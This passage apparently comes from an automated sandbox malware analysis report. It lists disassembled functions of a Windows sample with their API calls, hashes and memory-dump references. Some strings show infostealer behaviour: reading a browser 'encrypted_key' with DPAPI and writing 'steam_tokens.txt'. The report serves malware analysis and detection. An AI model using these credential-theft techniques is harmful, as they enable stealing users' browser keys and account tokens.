                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 7550dd6610b743046657cfad825c6434ab704e17789f9e743812bf873480c296
                            • Instruction ID: 7db9bcd3d8e27c66e83faec6f7e457d814bcbd6c601a7e220ef29684bdeef50e
                            • Opcode Fuzzy Hash: 7550dd6610b743046657cfad825c6434ab704e17789f9e743812bf873480c296
                            • Instruction Fuzzy Hash: F301F1B4600214BFD710CBA0DD48EAB7BADEB49741F100049FE4497341EAB0590887A0
                            Function 00452880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00452895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045289C
                              • Part of subcall function 00452910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00452925
                              • Part of subcall function 00452910: RtlAllocateHeap.NTDLL(00000000), ref: 0045292C
                              • Part of subcall function 00452910: RegOpenKeyExA.ADVAPI32(80000002,00FEB6F0,00000000,00020119,004528A9), ref: 0045294B
                              • Part of subcall function 00452910: RegQueryValueExA.ADVAPI32(004528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00452965
                              • Part of subcall function 00452910: RegCloseKey.ADVAPI32(004528A9), ref: 0045296F
                            • RegOpenKeyExA.ADVAPI32(80000002,00FEB6F0,00000000,00020119,00449500), ref: 004528D1
                            • RegQueryValueExA.ADVAPI32(00449500,00FFF718,00000000,00000000,00000000,000000FF), ref: 004528EC
                            • RegCloseKey.ADVAPI32(00449500), ref: 004528F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 74988934947fbbda32ca01f1dfdb70326c9d564f3e0c10a0618c339bb88e74d1
                            • Instruction ID: cd81fa2256b4bc9cc95ef9ddc381814a57339ff93ff266aa28a53dedd6826061
                            • Opcode Fuzzy Hash: 74988934947fbbda32ca01f1dfdb70326c9d564f3e0c10a0618c339bb88e74d1
                            • Instruction Fuzzy Hash: 5101A2B1640208BFDB10ABB4ED49EAA776EEB44316F00025AFE08D3251DAF49D4487A0
                            Function 004371F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 0043723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00437279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00437280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004372C3
                            • HeapFree.KERNEL32(00000000), ref: 004372CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00437329
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 8c7f4e8b0cfbc9b17a210c648af944d8b108c6d4be8c55638bf712f7815c5723
                            • Instruction ID: aa5791660fc8f8593e66a88da70ce7c70cae169ff2882ce047d8603823744c82
                            • Opcode Fuzzy Hash: 8c7f4e8b0cfbc9b17a210c648af944d8b108c6d4be8c55638bf712f7815c5723
                            • Instruction Fuzzy Hash: 06418EB17046059BEB20CF69DC84BABB3E9FB88305F1455AAEC9DC7340E675E900DB54
                            Function 0044D7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0044D7D6
                            • RegOpenKeyExA.ADVAPI32(80000001,00FFE310,00000000,00020119,?), ref: 0044D7F5
                            • RegQueryValueExA.ADVAPI32(?,00FFF0E8,00000000,00000000,00000000,000000FF), ref: 0044D819
                            • RegCloseKey.ADVAPI32(?), ref: 0044D823
                            • lstrcat.KERNEL32(?,00000000), ref: 0044D848
                            • lstrcat.KERNEL32(?,00FFF1C0), ref: 0044D85C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 02620483a9cf080f015603a337bb3ff61873f07f71b4e2726c76f8a1d18c6308
                            • Instruction ID: b438c268d874107c5aa21d434bb070d69544dbc71d917a1a7f8b44d8ec8290b8
                            • Opcode Fuzzy Hash: 02620483a9cf080f015603a337bb3ff61873f07f71b4e2726c76f8a1d18c6308
                            • Instruction Fuzzy Hash: 7A41D271A1020CAFDB14EF64EC82FDE7379AB48308F405169F90997251EE74AA85CFD4
                            Function 00439C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00439CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00439CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00439D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 03927ab13433b5bb69938c8729761642a30f716d3bec5c0fa861bc2e49fa474b
                            • Instruction ID: b49fe8dd15442e6d5fb67a7e8ecb0a4c330a9ed79f71ed2c2ae5acfc4a1790cd
                            • Opcode Fuzzy Hash: 03927ab13433b5bb69938c8729761642a30f716d3bec5c0fa861bc2e49fa474b
                            • Instruction Fuzzy Hash: ED41D331A002099BCF21EF65DD426EFB7B4AF58308F04646AED15A7352DAB8ED04C798
                            Function 0044E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044EA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EA53
                            • lstrcat.KERNEL32(?,00000000), ref: 0044EA61
                            • lstrcat.KERNEL32(?,00461794), ref: 0044EA7A
                            • lstrcat.KERNEL32(?,00FF9150), ref: 0044EA8D
                            • lstrcat.KERNEL32(?,00461794), ref: 0044EA9F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 19b95a5b6486dabc805b27e7b9b90f6bb8b5b5b6de83b3809747087d082f9c01
                            • Instruction ID: 0d575f7d3814f8b7cc75abfe564e0a70065157bb1456795f8ed8d72a9409759b
                            • Opcode Fuzzy Hash: 19b95a5b6486dabc805b27e7b9b90f6bb8b5b5b6de83b3809747087d082f9c01
                            • Instruction Fuzzy Hash: 9341C471A10218AFCB11EB65DD42FED7379BF8C300F0054ADFA1697290DEB49E449BA8
                            Function 0044ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044ECDF
                            • lstrlen.KERNEL32(00000000), ref: 0044ECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ED1D
                            • lstrlen.KERNEL32(00000000), ref: 0044ED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0044ED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: 6aa0cff1843997333f04cc070ceca1d576ae85bd3ad4988c394cffd34b342d51
                            • Instruction ID: 42768dec5fca2787c3b19dabcaacb9e80ed596dec451b3135427d29d94c9e9b4
                            • Opcode Fuzzy Hash: 6aa0cff1843997333f04cc070ceca1d576ae85bd3ad4988c394cffd34b342d51
                            • Instruction Fuzzy Hash: 4931B171B102055FD721BB7AED4AA6F7769AF44308F04212AF845CB212DBBCDC0587D9
                            Function 00439A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0043140E), ref: 00439A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0043140E), ref: 00439AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,0043140E), ref: 00439AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,0043140E,00000000,?,?,?,0043140E), ref: 00439AE0
                            • LocalFree.KERNEL32(?,?,?,?,0043140E), ref: 00439B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,0043140E), ref: 00439B07
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 7223349bbc93929fbefd9b14a8067fda10562556fb7a09bb3beb5e9887df7873
                            • Instruction ID: ba47ce375ea554bfae91b27664b16e124708a3d5bec596681fb4d7834a4ce2bb
                            • Opcode Fuzzy Hash: 7223349bbc93929fbefd9b14a8067fda10562556fb7a09bb3beb5e9887df7873
                            • Instruction Fuzzy Hash: CD115171600209AFD710EF69DD84AABB36DFB08344F10125AF90197380DBB4AD50CBA4
                            Function 00455AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455B14
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00455B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 00455B89
                            • memmove.MSVCRT(00000000,?,?), ref: 00455B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: e78ac724bf621d3ee9c435335a6144608f285e6cc0569da2dfbab5d99e6e7cca
                            • Instruction ID: 317fea2bad92b67d1b9e668cbba320fa464fb2f74d1d7996c1155275e57caa1c
                            • Opcode Fuzzy Hash: e78ac724bf621d3ee9c435335a6144608f285e6cc0569da2dfbab5d99e6e7cca
                            • Instruction Fuzzy Hash: 8D41A371B005189FCF18CF6CC995ABEB7B5EB89310F14822AE805E7345D634ED00CB94
                            Function 004590DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: b7465d2d798fdd0162d129fff1ad47e8d348e83b072adcf3e55365f1bca77b2f
                            • Instruction ID: 8682e11e0e9b1a82f9da917a1438ca555bb9405fb247e7234b97ba944ad051ce
                            • Opcode Fuzzy Hash: b7465d2d798fdd0162d129fff1ad47e8d348e83b072adcf3e55365f1bca77b2f
                            • Instruction Fuzzy Hash: 4E41167040075CEEEB218B248D85FFB7BFC9B45305F1448E9ED8686183E2759E498F28
                            Function 00447D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447D58
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1D5
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447D76
